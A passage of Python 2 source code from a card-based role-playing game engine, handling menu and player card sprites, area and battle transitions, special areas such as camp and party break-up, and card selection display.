"""必要であればメニューカードのリストを更新する。
"""
if self._after_update_mcardlist:
self._update_mcardlist()
def _update_mcardlist(self):
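"""Rebuild self._mcardtable (flag -> cards) and, unless a message
is showing, refresh self.list and self.index from the visible cards."""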
self._mcardtable = {}
mcards = self.get_mcards()
visible = []
for mcard in mcards:
if mcard.status != "hidden":
visible.append(mcard)
if mcard.flag:
seq = self._mcardtable.get(mcard.flag, [])
seq.append(mcard)
if len(seq) == 1:
self._mcardtable[mcard.flag] = seq
if not self.is_showingmessage():
self.list = visible
self.index = -1
def update_pcimage(self, pcnumber, deal):
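"""Propagate a changed PC image (pcnumber is 1-based) to any
backgrounds and menu cards that reference it. When deal is True the
affected cards are hidden, updated and re-dealt immediately;
the list of updated cards is returned."""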
if not self.file_updates_bg or deal:
for bgtype, d in self.background.bgs:
if bgtype == cw.sprite.background.BG_PC:
bgpcnumber = d[0]
if bgpcnumber == pcnumber:
if deal:
self.background.reload(False)
else:
self.file_updates_bg = True
break
updates = []
pcards = self.get_pcards()
pcard = pcards[pcnumber-1] if pcnumber-1 < len(pcards) else None
for mcard in self.get_mcards():
if not mcard.is_initialized():
continue
imgpaths = []
can_loaded_scaledimages = []
can_loaded_scaledimage = pcard.data.getbool(".", "scaledimage", False) if pcard else True
update = False
if isinstance(mcard.cardimg, cw.image.CharacterCardImage) and mcard.cardimg.is_override_image:
cardimg_paths = mcard.cardimg.override_images[0]
cardimg_can_loaded_scaledimage = mcard.cardimg.override_images[1]
else:
cardimg_paths = mcard.cardimg.paths
cardimg_can_loaded_scaledimage = mcard.cardimg.can_loaded_scaledimage
for i, info in enumerate(cardimg_paths):
# Update the PC image
if info.pcnumber == pcnumber:
if pcard:
for base in pcard.imgpaths:
imgpaths.append(cw.image.ImageInfo(base.path, pcnumber, info.base, basecardtype="LargeCard"))
can_loaded_scaledimages.append(can_loaded_scaledimage)
else:
imgpaths.append(cw.image.ImageInfo(pcnumber=pcnumber, base=info.base, basecardtype="LargeCard"))
can_loaded_scaledimages.append(False)
update = True
else:
imgpaths.append(info)
if isinstance(cardimg_can_loaded_scaledimage, (list, tuple)):
can_loaded_scaledimages.append(cardimg_can_loaded_scaledimage[i])
else:
assert isinstance(cardimg_can_loaded_scaledimage, bool)
can_loaded_scaledimages.append(cardimg_can_loaded_scaledimage)
if not update:
continue
if isinstance(mcard.cardimg, cw.image.CharacterCardImage) and mcard.cardimg.is_override_image:
mcard.cardimg.override_images_upd = (imgpaths, can_loaded_scaledimages)
else:
mcard.cardimg.paths_upd = imgpaths
mcard.cardimg.can_loaded_scaledimage_upd = can_loaded_scaledimages
if deal:
mcard.cardimg.fix_pcimage_updated()
mcard.cardimg.clear_cache()
updates.append(mcard)
if deal:
if cw.cwpy.setting.all_quickdeal:
force_dealspeed = self.force_dealspeed
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
cw.animation.animate_sprites(updates, "hide")
for mcard in updates:
mcard.update_image()
cw.animation.animate_sprites(updates, "deal")
finally:
self.force_dealspeed = force_dealspeed
else:
for mcard in updates:
cw.animation.animate_sprite(mcard, "hide")
mcard.update_image()
cw.animation.animate_sprite(mcard, "deal")
if cw.cwpy.background.has_jpdcimage:
cw.cwpy.file_updates_bg = True
return updates
def show_party(self):
"""非表示のPlayerCardを再表示にする。"""
pcards = [i for i in self.get_pcards() if i.status == "hidden"]
if pcards:
seq = []
for pcard in pcards:
if pcard.inusecardimg and not pcard.inusecardimg.center:
seq.append(pcard.inusecardimg)
cw.animation.animate_sprites(pcards + seq, "shiftup")
self._show_party()
def _show_party(self):
if self.ydata and self.ydata.party and not self.ydata.party.is_loading():
self.is_showparty = True
self.input(True)
self.event.refresh_showpartytools()
def hide_party(self):
"""PlayerCardを非表示にする。"""
pcards = [i for i in self.get_pcards() if not i.status == "hidden"]
if pcards:
seq = []
for pcard in pcards:
if pcard.inusecardimg and not pcard.inusecardimg.center:
seq.append(pcard.inusecardimg)
cw.animation.animate_sprites(pcards + seq, "shiftdown")
self.is_showparty = False
self.selection = None
self.input(True)
self.event.refresh_showpartytools()
def set_pcards(self):
# Create the player card sprites
if self.ydata and self.ydata.party and not self.get_pcards():
for idx, e in enumerate(self.ydata.party.members):
pos_noscale = 95 * idx + 9 * (idx + 1), 285
cw.sprite.card.PlayerCard(e, pos_noscale=pos_noscale, index=idx)
# Set the number coupons
self.ydata.party._loading = False
def set_sprites(self, dealanime=True,
bginhrt=False, ttype=("Default", "Default"),
doanime=True, data=None,
nocheckvisible=False):
"""エリアにスプライトをセットする。
bginhrt: Trueの時は背景継承。
"""
# Remove the contents of the menu card sprite group
self.cardgrp.remove(self.mcards)
self.mcards = []
self.mcards_expandspchars.clear()
self.file_updates.clear()
# Remove the contents of the player card sprite group
if self.ydata:
if not self.ydata.party or self.ydata.party.is_loading():
self.cardgrp.remove(self.pcards)
self.pcards = []
# Create the background sprites
if not bginhrt:
try:
self.background.load(self.sdata.get_bgdata(), doanime, ttype, nocheckvisible=nocheckvisible)
except cw.event.EffectBreakError:
# JPY1 processing was aborted by F9 etc.
assert doanime
return
# For special areas (camp, party break-up), add a curtain to the background.
if self.areaid in (cw.AREA_CAMP, cw.AREA_BREAKUP):
self.set_curtain(curtain_all=True)
# Create the menu card sprites
self.set_mcards(self.sdata.get_mcarddata(data=data), dealanime)
# Create the player card sprites
self.set_pcards()
# On the camp screen, also add the FriendCards to the sprite group
if self.areaid == cw.AREA_CAMP:
self.add_fcardsprites(status="hidden")
def add_fcardsprites(self, status, alpha=None):
"""cardgrpに同行NPCのスプライトを追加する。"""
seq = list(enumerate(self.get_fcards()))
for index, fcard in reversed(seq):
index = 5 - index
pos = (95 * index + 9 * (index + 1), 5)
fcard.set_pos_noscale(pos)
fcard.status = status
fcard.set_alpha(alpha)
self.add_lazydraw(clip=fcard.rect)
if fcard.status == "hidden":
fcard.clear_image()
self.cardgrp.add(fcard, layer=fcard.layer_t)
self.mcards.append(fcard)
else:
self.cardgrp.add(fcard, layer=fcard.layer_t)
self.mcards.append(fcard)
if not alpha is None:
fcard.update_image()
fcard.deal()
self.list = self.get_mcards("visible")
self.index = -1
def clear_fcardsprites(self):
"""cardgrpから同行NPCのスプライトを取り除く。"""
fcards = []
for fcard in self.mcards[:]:
if isinstance(fcard, cw.character.Friend):
fcard.set_alpha(None)
fcard.hide()
fcard.layer = (cw.LAYER_FCARDS, cw.LTYPE_FCARDS, fcard.index, 0)
fcards.append(fcard)
self.mcards.remove(fcard)
self.mcards_expandspchars.discard(fcard)
self.add_lazydraw(clip=fcard.rect)
self.cardgrp.remove(fcards)
self.list = self.get_mcards("visible")
self.index = -1
def update_mcardnames(self):
for mcard in self.mcards_expandspchars:
if mcard.is_initialized():
name = mcard.name
mcard.update_name()
if mcard.name != name:
self.add_lazydraw(mcard.rect)
self.set_lazydraw()
def set_autospread(self, mcards, maxcol, campwithfriend=False, anime=False):
"""自動整列設定時のメニューカードの配置位置を設定する。
mcards: MenuCard or EnemyCardのリスト。
maxcol: この値を超えると改行する。
campwithfriend: キャンプ画面時&FriendCardが存在しているかどうか。
anime: カードを一旦消去してから再配置するならTrue。
"""
def get_size_noscale(mcard):
assert hasattr(mcard, "cardimg")
if isinstance(mcard.cardimg, cw.image.CharacterCardImage) or\
isinstance(mcard.cardimg, cw.image.LargeCardImage):
return cw.setting.get_resourcesize("CardBg/LARGE")
elif isinstance(mcard.cardimg, cw.image.CardImage):
return cw.setting.get_resourcesize("CardBg/NORMAL")
else:
assert False
def set_mcardpos_noscale(mcards, (maxw, maxh), y):
n = maxw + 5
x = (632 - n * len(mcards) + 5) / 2
grpidx = {}
for mcard in mcards:
if mcard.cardgroup:
gi = grpidx.get(mcard.cardgroup, 0)
# Do not align cards that are subject to repositioning
if not mcard.cardgroup or not (mcard.cardgroup, gi) in self.sdata.moved_mcards:
w, h = get_size_noscale(mcard)
if mcard.scale != 100:
mcard.set_scale(100)
mcard.set_pos_noscale((x + maxw - w, y + maxh - h))
if mcard.cardgroup:
grpidx[(mcard.cardgroup, gi)] = gi + 1
x += n
maxw = 0
maxh = 0
for mcard in mcards:
w, h = get_size_noscale(mcard)
maxw = max(w, maxw)
maxh = max(h, maxh)
if anime:
cw.animation.animate_sprite(mcard, "hide")
n = len(mcards)
if campwithfriend:
y = (145 - maxh) / 2 + 140 - 2
set_mcardpos_noscale(mcards, (maxw, maxh), y)
elif n <= maxcol:
y = (285 - maxh) / 2 - 2
set_mcardpos_noscale(mcards, (maxw, maxh), y)
else:
y = (285 - 10 - maxh * 2) / 2
y2 = y + maxh + 5
p = n / 2 + n % 2
set_mcardpos_noscale(mcards[:p], (maxw, maxh), y)
set_mcardpos_noscale(mcards[p:], (maxw, maxh), y2)
if anime:
for mcard in mcards:
cw.animation.animate_sprite(mcard, "deal")
if self.battle:
self.battle.numenemy = len(cw.cwpy.get_mcards("flagtrue"))
def set_mcards(self, (stype, elements), dealanime=True, addgroup=True, setautospread=True):
"""メニューカードスプライトを構成する。
生成されたカードのlistを返す。
(stype, elements): (spreadtype, MenuCardElementのリスト)のタプル
dealanime: True時はカードを最初から表示している。
addgroup: True時は現在の画面に即時反映する。
"""
# When the card arrangement is Auto
if stype == "Auto":
autospread = True
else:
autospread = False
if setautospread:
self._autospread = autospread
status = "hidden" if dealanime else "normal"
seq = []
grpidx = {}
moved_mcards = {} # rebuilt to drop stale reposition entries
for i, e in enumerate(elements):
cardgroup = e.gettext("Property/CardGroup", "")
if stype == "Auto":
pos_noscale = (0, 0)
else:
left = e.getint("Property/Location", "left")
top = e.getint("Property/Location", "top")
pos_noscale = (left, top)
status2 = status
if status2 != "hidden":
if not cw.sprite.card.CWPyCard.is_flagtrue_static(e):
status2 = "hidden"
if cardgroup:
gi = grpidx.get(cardgroup, 0)
moveddata = self.sdata.moved_mcards.get((cardgroup, gi), None)
else:
moveddata = None
if e.tag == "EnemyCard":
if self.sdata.get_castname(e.getint("Property/Id", -1)) is None:
continue
mcard = cw.sprite.card.EnemyCard(e, pos_noscale, status2, addgroup, i,
moveddata=moveddata)
else:
mcard = cw.sprite.card.MenuCard(e, pos_noscale, status2, addgroup, i,
moveddata=moveddata)
if not mcard.is_flagtrue():
mcard.status = "hidden"
if cardgroup:
if moveddata:
moved_mcards[(cardgroup, gi)] = moveddata
grpidx[cardgroup] = gi + 1
seq.append(mcard)
if 0 <= self.areaid:
self.sdata.moved_mcards = moved_mcards
return seq
def disposition_pcards(self):
"""プレイヤーカードの位置を補正する。
対象消去が発生した場合や解散直後に適用。
"""
if self.ydata and self.ydata.party:
# Fully remove members that were in a cancellable vanished state (compatibility behavior)
for pcard in self.ydata.party.vanished_pcards:
pcard.commit_vanish()
self.ydata.party.vanished_pcards = []
for index, pcard in enumerate(self.get_pcards()):
x = 9 + 95 * index + 9 * index
y = pcard._pos_noscale[1]
pcard.get_baserect()[0] = cw.s(x)
y2 = pcard.rect.top
size = pcard.rect.size
baserect = pcard.get_baserect()
if pcard.rect.size == (0, 0):
pcard.rect.size = baserect.size
pcard.rect.center = baserect.center
pcard.rect.top = y2
pcard.cardimg.rect[0] = cw.s(x)
pcard._pos_noscale = (x, y)
pcard.rect.size = size
for i, t in enumerate(pcard.zoomimgs):
img, rect = t
rect.center = pcard.rect.center
pcard.zoomimgs[i] = (img, rect)
pcard.index = index
self._need_disposition = False
def change_area(self, areaid, eventstarting=True,
bginhrt=False, ttype=("Default", "Default"),
quickdeal=False, specialarea=False, startbattle=False,
doanime=True, data=None, nocheckvisible=False, resume=False,
force_updatebg=False):
"""ゲームエリアチェンジ。
eventstarting: Falseならエリアイベントは起動しない。
bginhrt: 背景継承を行うかどうかのbool値。
ttype: トランジション効果のデータのタプル((効果名, 速度))
"""
if self.ydata and not self.is_playingscenario():
oldchanged = self.ydata.is_changed()
else:
oldchanged = True
# Quick switching is always enabled while at the yado
force_dealspeed = self.force_dealspeed
if self.setting.all_quickdeal and not self.is_playingscenario():
quickdeal = True
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
# When forcibly changing areas from the debugger etc., leave any special area
if not specialarea:
self.clean_specials()
# bool: whether to inherit the background
bginhrt |= bool(self.areaid < 0 and self.areaid != cw.AREA_BREAKUP)
bginhrt &= not force_updatebg
oldareaid = self.areaid
self.areaid = areaid
if 0 <= oldareaid and 0 <= self.areaid:
# Discard card relocation data
self.moved_mcards = {}
if not self.sdata.change_data(areaid, data=data):
raise cw.event.EffectBreakError()
bginhrt |= bool(self.areaid < 0)
bginhrt &= not force_updatebg
self.hide_cards(True, quickhide=quickdeal)
self.set_sprites(bginhrt=bginhrt, ttype=ttype, doanime=doanime, data=data,
nocheckvisible=nocheckvisible)
if not self.is_playingscenario() and not self.is_showparty and self.status != "GameOver":
# While at the inn, keep everyone fully recovered
for pcard in self.get_pcards():
pcard.set_fullrecovery()
pcard.update_image()
if not self.is_playingscenario():
self.disposition_pcards()
if 0 <= oldareaid and self.ydata and self.is_playingscenario():
self.ydata.changed()
# Only when resuming an adventure, animate the PCs first
if resume:
self.show_party()
# Start the area event (not started when returning from a special area)
if eventstarting and oldareaid >= 0:
if not self.wait_showcards:
self.deal_cards(quickdeal=quickdeal, startbattle=startbattle)
else:
self.draw()
self.force_dealspeed = force_dealspeed
if self.is_playingscenario() and self.sdata.in_f9:
# Reached when F9 was pressed while the cards were being drawn
return
if self.areaid >= 0 and self.status == "Scenario":
self.elapse_time()
if self._need_disposition:
self.disposition_pcards()
self.draw()
self.sdata.start_event(keynum=1)
else:
self.deal_cards(quickdeal=quickdeal, startbattle=startbattle)
self.force_dealspeed = force_dealspeed
if not startbattle and not pygame.event.peek(pygame.locals.USEREVENT):
self.show_party()
if self._need_disposition:
self.disposition_pcards()
self.draw()
if self.ydata and not self.is_playingscenario():
self.ydata._changed = oldchanged
def change_battlearea(self, areaid):
"""
Start the battle with the specified ID.
"""
data = self.sdata.get_resdata(True, areaid)
if data is None:
raise cw.event.EffectBreakError()
# Abort target selection if one is in progress
self.lock_menucards = True
self.clean_specials()
self.play_sound("battle", from_scenario=True, material_override=True)
self.statusbar.change(False, encounter=True)
path = data.gettext("Property/MusicPath", "")
volume = data.getint("Property/MusicPath", "volume", 100)
loopcount = data.getint("Property/MusicPath", "loopcount", 0)
channel = data.getint("Property/MusicPath", "channel", 0)
fade = data.getint("Property/MusicPath", "fadein", 0)
continue_bgm = data.getbool("Property/MusicPath", "continue", False)
music = self.music[channel]
self.set_battle()
# Battle start animation
sprite = cw.sprite.background.BattleCardImage()
cw.animation.animate_sprite(sprite, "battlestart")
oldareaid = self.areaid
oldbgmpath = (music.path, music.subvolume, music.loopcount, channel)
if self.sdata.pre_battleareadata:
oldareaid = self.sdata.pre_battleareadata[0]
oldbgmpath = self.sdata.pre_battleareadata[1]
# Play the battle music
if not continue_bgm:
music.play(path, subvolume=volume, loopcount=loopcount, fade=fade)
self.change_area(areaid, False, bginhrt=True, ttype=("None", "Default"), startbattle=True)
cw.animation.animate_sprite(sprite, "hide")
sprite.remove(cw.cwpy.cardgrp)
self.sdata.pre_battleareadata = (oldareaid, oldbgmpath, (music.path, music.subvolume, music.loopcount, music.channel))
cw.battle.BattleEngine(data)
self.lock_menucards = False
def clear_battlearea(self, areachange=True, eventkeynum=0, startnextbattle=False, is_battlestarting=False):
"""戦闘状態を解除して戦闘前のエリアに戻る。
areachangeがFalseだったら、戦闘前のエリアには戻らない
(戦闘イベントで、エリア移動コンテント等が発動した時用)。
"""
if not cw.cwpy.is_playingscenario():
cw.cwpy.battle = None
return
if self.status == "ScenarioBattle":
if isinstance(self.event.get_selectedmember(), cw.character.Enemy):
self.event.clear_selectedmember()
# Keep a reference to the victory events
battleevents = self.sdata.events
if eventkeynum:
self.winevent_areaid = self.areaid
cw.cwpy.battle = None
for pcard in self.get_pcards():
pcard.deck.clear(pcard)
pcard.remove_timedcoupons(True)
for fcard in self.get_fcards():
fcard.deck.clear(fcard)
fcard.remove_timedcoupons(True)
areaid, bgmpath, _battlebgmpath = self.sdata.pre_battleareadata
if not startnextbattle:
self.sdata.pre_battleareadata = None
self.set_scenario()
# Restore the most recently specified BGM
self.music[bgmpath[3]].play(bgmpath[0], subvolume=bgmpath[1], loopcount=bgmpath[2])
# Some statuses are recovered
for pcard in self.get_pcards():
if pcard.is_bind() or pcard.mentality != "Normal":
if pcard.status == "hidden":
pcard.set_bind(0)
pcard.set_mentality("Normal", 0)
pcard.update_image()
else:
self.play_sound("harvest")
pcard.set_bind(0)
pcard.set_mentality("Normal", 0)
cw.animation.animate_sprite(pcard, "hide", battlespeed=True)
pcard.update_image()
cw.animation.animate_sprite(pcard, "deal", battlespeed=True)
if (areachange or (startnextbattle and not is_battlestarting)) and eventkeynum != 3 and not cw.cwpy.sct.lessthan("1.20", cw.cwpy.sdata.get_versionhint()):
# Time elapses on victory or a successful escape
# No time elapses on mid-battle area moves, defeat events, or engine 1.20 and earlier
self.elapse_time()
if self.is_gameover():
self.set_gameover()
return
# Restore the NPCs' states
self.sdata.fullrecovery_fcards()
if areachange:
# Return to the pre-battle area
self.change_area(areaid, False, ttype=("None", "Default"), bginhrt=True)
self.statusbar.change(False)
if eventkeynum:
# Start the victory event
self.event.clear_selectedmember()
self.event.clear_selectedcard()
battleevents.start(keynum=eventkeynum)
self.winevent_areaid = None
def change_specialarea(self, areaid):
"""特殊エリア(エリアIDが負の数)に移動する。"""
updatestatusbar = True
if areaid < 0:
self.pre_areaids.append((self.areaid, self.sdata.data))
# Party breakup and the camp area are handled as a full area change
if areaid in (cw.AREA_BREAKUP, cw.AREA_CAMP):
if cw.cwpy.ydata:
changed = cw.cwpy.ydata.is_changed()
self.clear_fcardsprites()
force_dealspeed = self.force_dealspeed
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
self.change_area(areaid, quickdeal=True, specialarea=True)
finally:
self.force_dealspeed = force_dealspeed
if cw.cwpy.ydata:
cw.cwpy.ydata._changed = changed
if areaid == cw.AREA_BREAKUP:
self._store_partyrecord()
self.create_poschangearrow()
else:
if areaid not in self.sdata.sparea_mcards:
cw.cwpy.call_dlg("ERROR", text=u"指定された特殊エリア(ID=%s)は存在しません。" % areaid)
self.pre_areaids.pop()
return
self.areaid = areaid
self.sdata.change_data(areaid)
self.pre_mcards.append(self.get_mcards())
self.cardgrp.remove(self.mcards)
self.mcards = []
self.mcards_expandspchars.clear()
self.file_updates.clear()
for mcard in self.sdata.sparea_mcards[areaid]:
self.cardgrp.add(mcard, layer=mcard.layer)
self.mcards.append(mcard)
if mcard.spchars:
self.mcards_expandspchars.add(mcard)
# Cards in a special area may change visibility
# depending on whether debug mode is on
for mcard in self.sdata.sparea_mcards[areaid]:
if (mcard.debug_only and not self.is_debugmode()) or not mcard.is_flagtrue():
mcard.hide()
else:
mcard.deal()
if self.is_autospread():
mcards = self.get_mcards("flagtrue")
self.set_autospread(mcards, 6, False, anime=False)
self.list = self.get_mcards("visible")
self.index = -1
self.set_curtain(curtain_all=True)
self.lock_menucards = False
# Target-selection area
elif self.selectedheader:
self.clear_fcardsprites()
self.clear_selection()
header = self.selectedheader
owner = header.get_owner()
cardtarget = header.target
if isinstance(owner, cw.sprite.card.EnemyCard):
# When selecting an enemy's action, swap friend and foe in the target
if cardtarget == "Enemy":
cardtarget = "Party"
elif cardtarget == "Party":
cardtarget = "Enemy"
if cardtarget in ("Both", "Enemy", "Party"):
if self.status == "Scenario":
self.set_curtain(target=cardtarget)
elif self.is_battlestatus():
if header.allrange:
if cardtarget == "Party":
targets = self.get_pcards("unreversed")
elif cardtarget == "Enemy":
targets = self.get_ecards("unreversed")
else:
targets = self.get_pcards("unreversed")
targets.extend(self.get_ecards("unreversed"))
owner.set_action(targets, header)
self.clear_specialarea()
else:
self.set_curtain(target=cardtarget)
self.lock_menucards = False
elif cardtarget in ("User", "None"):
if self.status == "Scenario":
if cw.cwpy.setting.confirm_beforeusingcard:
owner.image = owner.get_selectedimage()
def func(owner):
if cw.cwpy.setting.confirm_beforeusingcard:
self.change_selection(owner)
self.call_modaldlg("USECARD")
self.exec_func(func, owner)
elif self.is_battlestatus():
owner.set_action(owner, header)
self.clear_specialarea()
self.lock_menucards = False
updatestatusbar = False
else:
self.lock_menucards = False
if updatestatusbar:
self.exec_func(self.statusbar.change, True)
self.disposition_pcards()
def clear_specialarea(self, redraw=True):
"""特殊エリアに移動する前のエリアに戻る。
areaidが-3(パーティ解散)の場合はエリアチェンジする。
"""
if redraw:
self.clear_inusecardimg()
self.clear_guardcardimg()
self._stored_partyrecord = None
targetselectionarea = False
callpredlg = False
oldareaid = self.areaid
if self.areaid < 0:
self.selectedheader = None
areaid, data = self.pre_areaids.pop()
# The curtain is always shown while camping
if areaid != cw.AREA_CAMP:
self.clear_curtain()
# Leaving the party-breakup area
if self.areaid == cw.AREA_BREAKUP:
self.topgrp.empty()
for i, pcard in enumerate(self.get_pcards()):
pcard.index = i
pcard.layer = (pcard.layer[0], pcard.layer[1], i, pcard.layer[3])
self.cardgrp.change_layer(pcard, pcard.layer)
self.disposition_pcards()
# Leaving a card-trade area
if oldareaid in cw.AREAS_TRADE:
self.areaid = areaid
self.sdata.change_data(areaid, data=data)
self.cardgrp.remove(self.mcards)
self.mcards = []
self.mcards_expandspchars.clear()
self.file_updates.clear()
for mcard in self.pre_mcards.pop():
if areaid == cw.AREA_CAMP and hasattr(mcard, "layer_t"):
self.cardgrp.add(mcard, layer=mcard.layer_t)
else:
self.cardgrp.add(mcard, layer=mcard.layer)
self.mcards.append(mcard)
if mcard.spchars:
self.mcards_expandspchars.add(mcard)
self.deal_cards()
self.list = self.get_mcards("visible")
self.index = -1
else:
if cw.cwpy.ydata:
changed = cw.cwpy.ydata.is_changed()
# PyLite: TODO: this looks buggy
force_dealspeed = self.force_dealspeed
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
self.change_area(areaid, data=data, quickdeal=True, specialarea=True)
finally:
self.force_dealspeed = force_dealspeed
if cw.cwpy.ydata:
cw.cwpy.ydata._changed = changed
elif self.is_battlestatus():
self.clear_curtain()
self.selectedheader = None
if self.battle.is_ready():
self.battle.update_showfcards()
callpredlg = True
else:
# Leaving the target-selection area
self.selectedheader = None
targetselectionarea = True
if self.is_curtained():
self.clear_curtain()
if self.pre_dialogs:
callpredlg = True
def func():
showbuttons = not self.is_playingscenario() or\
(not self.areaid in cw.AREAS_TRADE and self.areaid in cw.AREAS_SP) or\
oldareaid == cw.AREA_CAMP or\
(targetselectionarea and not self.is_runningevent()) or\
(self.is_battlestatus() and self.battle.is_ready())
self.statusbar.change(showbuttons)
self.draw()
self.exec_func(func)
self.disposition_pcards()
if not callpredlg:
self.change_selection(self.selection)
if oldareaid != cw.AREA_CAMP and redraw:
self.draw()
if callpredlg:
self.call_predlg()
def clean_specials(self):
"""デバッガやF9で強制的なエリア移動等を発生させる時、
特殊エリアにいたりバックログを開いていたりした場合は
クリアして通常状態へ戻す。
"""
if self.is_showingbacklog():
self._is_showingbacklog = False
if self.is_curtained():
self.pre_dialogs = []
if self.areaid in cw.AREAS_TRADE:
self.topgrp.empty()
self.clear_specialarea()
def check_level(self, fromscenario):
"""PCの経験点を確認し、条件を満たしていれば
レベルアップ・ダウン処理を行う。
fromscenarioがTrueであれば同時に完全回復も行う。
"""
for pcard in self.get_pcards():
pcard.adjust_level(fromscenario)
def create_poschangearrow(self):
"""パーティ解散エリアにメンバ位置入替用の
クリック可能スプライトを配置する。
"""
if self.areaid != cw.AREA_BREAKUP:
return
if 0 <= self.index and isinstance(self.selection, cw.sprite.background.ClickableSprite):
index = self.index
self.clear_selection()
else:
index = -1
self.topgrp.empty()
def get_image():
return self.rsrc.pygamedialogs["REPLACE_POSITION"]
def get_selimage():
bmp = self.rsrc.pygamedialogs["REPLACE_POSITION"].convert_alpha()
return cw.imageretouch.add_lightness(bmp, 64)
bmp = self.rsrc.pygamedialogs["REPLACE_POSITION_noscale"]
w, h = bmp.get_size()
scr_scale = bmp.scr_scale if hasattr(bmp, "scr_scale") else 1
w //= scr_scale
h //= scr_scale
size_noscale = (w, h)
pcards = self.get_pcards()
class Replace(object):
def __init__(self, outer, i):
self.outer = outer
self.index1 = i
self.index2 = i+1
def replace(self):
self.outer.replace_pcardorder(self.index1, self.index2)
seq = []
for i, pcard in enumerate(pcards[0:-1]):
replace = Replace(self, i)
pos_noscale = pcard.get_pos_noscale()
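# Center the arrow within the 9px gap to the right of this 95px-wide
# card (9/2 is integer division under Python 2), 5px above the card top.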
x_noscale = pos_noscale[0] + 95+9/2 - size_noscale[0]/2
y_noscale = pos_noscale[1] - size_noscale[1] - 5
sprite = cw.sprite.background.ClickableSprite(get_image, get_selimage,
(x_noscale, y_noscale),
self.topgrp, replace.replace)
seq.append(sprite)
if index != -1:
self.index = index
self.list = seq
self.change_selection(self.list[index])
self.draw(clip=cw.s(pygame.Rect((0, 0), cw.SIZE_AREA)))
def replace_pcardorder(self, index1, index2):
"""パーティメンバの位置を入れ替える。"""
if not (self.ydata and self.ydata.party):
return
self.ydata.party.replace_order(index1, index2)
self.create_poschangearrow()
def show_numberofcards(self, type):
"""カードの所持枚数とカード交換スプライトを表示する。"""
if type == "SkillCard":
cardtype = cw.POCKET_SKILL
elif type == "ItemCard":
cardtype = cw.POCKET_ITEM
elif type == "BeastCard":
cardtype = cw.POCKET_BEAST
for pcard in self.get_pcards("unreversed"):
cw.sprite.background.NumberOfCards(pcard, cardtype, self.topgrp)
# Card-exchange sprite
def get_image():
return self.rsrc.pygamedialogs["REPLACE_CARDS"]
def get_selimage():
bmp = self.rsrc.pygamedialogs["REPLACE_CARDS"].convert_alpha()
return cw.imageretouch.add_lightness(bmp, 64)
bmp = self.rsrc.pygamedialogs["REPLACE_CARDS_noscale"]
w, h = bmp.get_size()
scr_scale = bmp.scr_scale if hasattr(bmp, "scr_scale") else 1
w //= scr_scale
h //= scr_scale
size_noscale = (w, h)
pcards = self.get_pcards()
class ReplaceCards(object):
def __init__(self, outer, pcard):
self.outer = outer
self.pcard = pcard
def replace_cards(self):
self.outer.change_selection(self.pcard)
self.outer.call_modaldlg("CARDPOCKET_REPLACE")
seq = []
for pcard in pcards:
if pcard.is_reversed():
continue
if type == "BeastCard":
if not filter(lambda c: c.attachment, pcard.get_pocketcards(cardtype)):
continue
else:
if not pcard.get_pocketcards(cardtype):
continue
replace = ReplaceCards(self, pcard)
pos_noscale = pcard.get_pos_noscale()
x_noscale = pos_noscale[0] + cw.setting.get_resourcesize("CardBg/LARGE")[0] - size_noscale[0] - 2
y_noscale = pos_noscale[1] - size_noscale[1] - 2
sprite = cw.sprite.background.ClickableSprite(get_image, get_selimage,
(x_noscale, y_noscale),
self.topgrp, replace.replace_cards)
seq.append(sprite)
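# NOTE: the ClickableSprite constructor appears to register each sprite
# with self.topgrp itself; seq mirrors create_poschangearrow() but is
# otherwise unused here.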
def clear_numberofcards(self):
"""所持枚数表示を消去する。"""
self.topgrp.empty()
#-------------------------------------------------------------------------------
# Selection methods
#-------------------------------------------------------------------------------
def clear_selection(self):
"""全ての選択状態を解除する。"""
if self.selection:
self.change_selection(None)
cw.cwpy.update_mousepos()
cw.cwpy.sbargrp.update(cw.cwpy.scr_draw)
def change_selection(self, sprite):
"""引数のスプライトを選択状態にする。
sprite: SelectableSprite
"""
self.has_inputevent = True
sbarbtn1 = isinstance(self.selection, cw.sprite.statusbar.StatusBarButton)
sbarbtn2 = isinstance(sprite, cw.sprite.statusbar.StatusBarButton)
# Whether all members' battle actions are currently being shown
show_allselectedcards = self._show_allselectedcards
if sprite and not isinstance(sprite, cw.sprite.background.Curtain):
# Refresh the display when a specific character is selected
show_allselectedcards = False
elif not self._in_partyarea(self.mousepos):
# Clear the display when the mouse cursor moves above the party area
show_allselectedcards = False
if self.selection:
self.selection.image = self.selection.get_unselectedimage()
# Avoid clearing targetarrow and inusecardimg during a card event
if not self.is_runningevent():
self.clear_targetarrow()
self.clear_inusecardimg()
if sprite:
sprite.image = sprite.get_selectedimage()
else:
self.index = -1
self.selection = sprite
if (not self.is_runningevent()\
and isinstance(sprite, cw.character.Character)\
and (not self.selectedheader or self.is_battlestatus())\
and sprite.is_analyzable())\
or show_allselectedcards:
seq = itertools.chain(self.get_pcards("unreversed"),
self.get_ecards("unreversed"),
self.get_fcards("unreversed"))
elif not self.is_runningevent() and self.selectedheader and self.selectedheader.get_owner():
seq = [self.selectedheader.get_owner()]
else:
seq = []
for sprite in seq:
if not self.selectedheader or sprite != self.selectedheader.get_owner():
if not (isinstance(sprite, cw.character.Character)\
and sprite.actiondata\
and sprite.is_analyzable()\
and sprite.status != "hidden"):
continue
selowner = self.selectedheader and self.selectedheader.get_owner() == sprite
if cw.cwpy.ydata.party and cw.cwpy.ydata.party.backpack == sprite:
mcards = self.get_mcards("visible")
for mcard in mcards:
if isinstance(mcard, cw.sprite.card.MenuCard) and mcard.is_backpack():
sprite = mcard
break
else:
continue
elif cw.cwpy.ydata.storehouse == sprite:
mcards = self.get_mcards("visible")
for mcard in mcards:
if isinstance(mcard, cw.sprite.card.MenuCard) and mcard.is_storehouse():
sprite = mcard
break
else:
continue
self.clear_inusecardimg(sprite)
if selowner:
header = self.selectedheader
targets = []
elif sprite.actiondata:
targets, header, _beasts = sprite.actiondata
else:
targets = []
header = None
if header:
if self.selection == sprite and not selowner:
self.set_inusecardimg(sprite, header, fore=True)
if header.target == "None":
self.set_targetarrow([sprite])
elif targets:
self.set_targetarrow(targets)
elif self.setting.show_allselectedcards or selowner:
alpha = cw.cwpy.setting.get_inusecardalpha(sprite)
self.set_inusecardimg(sprite, header, alpha=alpha)
if self.setting.show_allselectedcards and isinstance(sprite, cw.sprite.card.PlayerCard):
show_allselectedcards = True
